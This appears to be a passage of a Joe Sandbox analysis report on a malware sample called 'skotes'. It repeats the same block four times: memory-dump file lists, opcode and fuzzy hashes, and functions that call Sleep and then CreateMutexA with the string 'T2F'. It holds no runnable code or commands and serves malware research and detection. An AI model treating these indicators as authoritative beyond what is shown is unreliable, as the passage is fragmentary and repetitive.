Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: df7c7e336a5b9e8fd00fa76eeca0561ceedf78bc0a3f7398b2233e686173b90e
Instruction ID: 1e3a8eda06315617b95aa5df5f7bc284947d56f2f946cd7b6d0b73eb9b05c10e
Opcode Fuzzy Hash: df7c7e336a5b9e8fd00fa76eeca0561ceedf78bc0a3f7398b2233e686173b90e
Instruction Fuzzy Hash: 173139717103049BEB08DB78CD8879DB762DB92310F24462EE014AB3D1D77D9990875B

Function 0040A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 3a58b44d362aa61d3eb895d1612704de2e16af94360dc7e897d5378c14cd125e
Instruction ID: 06031e4ffd5a013c1aa8746abd8061fcde58b0623091bd9fdfae8b770786abc6
Opcode Fuzzy Hash: 3a58b44d362aa61d3eb895d1612704de2e16af94360dc7e897d5378c14cd125e
Instruction Fuzzy Hash: 0B312771B003409BEB08DB68DD897ADB762AB96310F24467EE014AB3D1D77D8990875B

Function 0040A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: e9c9939545800b411d8e0a58b245d9c02efaece873ec5da58403ddd67dbdb581
Instruction ID: 282ab9ef4f1bcfa7b47450f8cd41b1000b6cf94a7584b6b20627ca322ca48c6a
Opcode Fuzzy Hash: e9c9939545800b411d8e0a58b245d9c02efaece873ec5da58403ddd67dbdb581
Instruction Fuzzy Hash: 91313B71B003009BEB08DB78DD8DBADB661DB96314F24862FE014A73D5D7BD8990875B

Function 0040A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 80a55ccdab8c7ab3757433247ed8bc07200553732fbe159a7e1d2e37e864c9b0
Instruction ID: ea8261b19a1b099e5ed4d674d98f59d2b4345b054d96cc78175c28cea36da9d5
Opcode Fuzzy Hash: 80a55ccdab8c7ab3757433247ed8bc07200553732fbe159a7e1d2e37e864c9b0
Instruction Fuzzy Hash: 2F312971B003009BEB18DB78DD89BADB761EB86314F24862EE014A73D1D77D8990871B

Function 0040A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
